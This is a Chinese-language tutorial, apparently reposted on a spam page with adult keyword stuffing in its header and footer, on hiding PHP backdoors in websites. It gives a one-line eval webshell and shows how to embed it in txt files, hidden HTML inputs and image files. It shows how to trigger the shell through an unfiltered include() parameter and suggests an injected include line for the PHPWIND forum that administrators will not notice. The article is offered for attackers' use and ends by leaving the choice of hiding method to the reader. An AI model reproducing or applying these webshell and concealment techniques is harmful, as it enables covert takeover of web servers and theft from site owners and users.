色综合图-色综合图片-色综合图片二区150p-色综合图区-玖玖国产精品视频-玖玖香蕉视频

您的位置:首頁技術(shù)文章
文章詳情頁

PHP網(wǎng)站后門的隱藏技巧測試報告

瀏覽:2日期:2024-02-04 09:37:47

要知道如果光把PHP語句放到圖片里是無論如何也不能執(zhí)行的,因為PHP只解析擴展名為php的文件。所以說要能使隱藏在圖片里的PHP語句執(zhí)行。我們就的借助PHP中的調(diào)用函數(shù) :include 、require 等。

我們還記得前些日子把木馬隱藏到圖片的文章吧。也就是在PHP文件里用include('x.gif')這樣的語句來調(diào)用隱藏在圖片的木馬語句。ASP中語句也類似。看似非常隱蔽但直接調(diào)用圖片對稍微懂點PHP的人就不難發(fā)現(xiàn)可疑之處。由于URL 里用GET方式很難傳遞參數(shù),這就使得插入木馬的性能得不到發(fā)揮。

include 函數(shù)在PHP中使用的比較頻繁,所以引起的安全問題也實在太多,例如PHPWIND1.36的漏洞就是因為include后面的變量沒做過濾引起的。由此我們就可以構(gòu)造類似的語句來插入到PHP文件中。然后把木馬隱藏到圖片或HTML文件里,可以說隱蔽性就更高了。如在PHPWIND論壇里插入下面的語句:<‘’?@include includ/.$PHPWIND_ROOT;? <mailto:?@include 'includ/'.$PHPWIND_ROOT;?>> 一般管理員是無法看出來的。

有了include 函數(shù)來輔助幫忙我們就可以把PHP木馬隱藏到 諸如 txt、html和圖片文件等很多類型的文件里來了。因為txt、html和圖片文件這三種類型的文件最無論在論壇還是文章系統(tǒng)里是最為常見的了,下面我們就依次來做測試。

首先建立一PHP文件test.php 文件內(nèi)容為:

<?php $test=$_GET['test']; @include 'test/'.$test; ?>;

Txt文件一般都是說明文件,所以我們把一句話木馬放到目錄的說明文件里就OK了。隨便建立一個TXT文件t.txt。我們把一句話木馬<?eval($_POST[cmd]);?>粘貼到t.txt文件里。然后訪問 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt> 如果你看到t.txt的內(nèi)容就證明Ok了, 然后把在lanker微型PHP后門客戶端 木馬地址添入 http://localhost/test/test.php?test=../t.txt <http://localhost/phpw/index.php?PHPWIND_ROOT=../robots.txt> 密碼里添入cmd就可以了,執(zhí)行返回的結(jié)果都可以看到。

對于HTML的文件,一般都為模版文件。為了使插入到HTML的文件的木馬能被調(diào)用執(zhí)行而且不被顯示出來,我們可以在HTML里加入一個隱藏屬性的文本框 ,如:<input type=hidden value='<?eval($_POST[cmd]);?>'> 然后使用方法同上。執(zhí)行的返回結(jié)果一般都可以查看源文件看到。 如使用查看本程序目錄功能。查看源文件內(nèi)容為 <input type=hidden value='C:Uniserver2_7swwwtest'> 我可以得到目錄為 C:Uniserver2_7swwwtest。

下面我們說說圖片文件,要說最為毒的一招莫過于把木馬隱藏到圖片里。我們可以直接對一個圖片進行編輯,把<?eval($_POST[cmd]);?>插入到圖片末尾。

經(jīng)測試一般都不會對圖片造成影響。然后同樣方法客戶端木馬地址添入 <http://localhost/test/test.php?test=../1.jpg> 我們查看PHP環(huán)境變量 返回的是結(jié)果是原圖片。

這里可能要和我們想象的結(jié)果有些差距了,其實命令已經(jīng)運行了,只是返回的結(jié)果看不到而已,因為這是真正的GIF文件,所以是不會顯示返回結(jié)果的,為了證明是否真的執(zhí)行了命令我們 執(zhí)行上傳文件命令。果不出所料,文件已經(jīng)成功上傳到服務(wù)器上。這樣偽造的優(yōu)點是隱蔽性好。缺點也自然不用說了是沒回顯。如果你想看到返回的結(jié)果,那就拿出記事本偽造一個假的圖片文件吧。

到這里就基本測試完了,怎樣隱蔽PHP后門就看你自己的選擇了。行文倉促,如有不妥之處,請指出.

標簽: PHP
主站蜘蛛池模板: 国产成人91高清精品免费 | 中文字幕 亚洲精品 | 亚洲精品国产国语 | 亚洲综合色一区二区三区另类 | 亚欧人成精品免费观看 | 久久99久久99精品 | 七七国产福利在线二区 | 一本本久综合久久爱 | 100000免费啪啪18免进 | 日产一一到六区网站免费 | 中文国产成人精品久久一 | xxxxxhd亚洲日本hd | 91久久精品国产一区二区 | 国产香蕉成人综合精品视频 | 99久热在线精品视频观看 | 欧美激情毛片裸推荐 | 怡红院免费播放全部视频 | 欧美精品久久久久久久免费观看 | 国产人做人爱免费视频 | 欧美性高清视频免费看www | 一区视频 | 国产一级做a爰片... | 国产精品三级手机在线观看 | 天天五月天丁香婷婷深爱综合 | 亚洲国产综合久久精品 | 在线精品国产一区二区 | 亚洲自偷 | 国产精品免费看久久久 | 国产成人精品日本亚洲网址 | 香港aa三级久久三级老师 | 欧美一级毛片俄罗斯 | 高清国产露脸捆绑01经典 | 普通话对白国产情侣自啪 | 亚洲另类激情综合偷自拍图 | 亚洲欧美字幕 | 日本一区二区三区在线 视频 | 亚洲精品综合一二三区在线 | 岛国在线永久免费视频 | 国产资源在线免费观看 | 狠狠干香蕉 | 国产精品久久国产精品99 |